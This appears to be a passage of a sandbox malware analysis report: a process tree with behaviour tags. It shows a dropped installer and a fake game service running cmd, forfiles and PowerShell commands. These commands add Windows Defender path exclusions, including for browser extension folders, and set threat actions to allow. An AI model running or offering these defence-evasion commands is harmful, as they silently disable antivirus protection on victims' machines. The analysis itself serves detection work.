        
        PID:4512
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,14742667700397869648,3714751180310307217,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3208 /prefetch:1
        5⤵
        
        PID:1424
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4572,i,14742667700397869648,3714751180310307217,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4584 /prefetch:8
        5⤵
        
        PID:6048
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4764,i,14742667700397869648,3714751180310307217,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4808 /prefetch:8
        5⤵
        
        PID:3548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2600 -ip 2600
1⤵
PID:1800

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:4544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4524 -ip 4524
1⤵
PID:5772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6060

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:5328
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5492
- - C:\Windows\Temp\177790.exe
    "C:\Windows\Temp\177790.exe" --list-devices
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6028

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
PID:9612
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:9788

C:\Users\Admin\AppData\Local\Temp\7zSB74A.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSB74A.tmp\Install.exe it /GpSdidzXAM 385118 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:9928
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:10888
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:10900
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:10916
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:11820
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:11832
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:11856
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:12108
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:12272
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:10896
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6400
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:6564
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6668
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6728
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5704
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6868
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:1540
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:12008
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6544
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3252
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8388
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8532
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:8556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8712
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:8724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8952
- - C:\Windows\SysWOW64\reg.exe
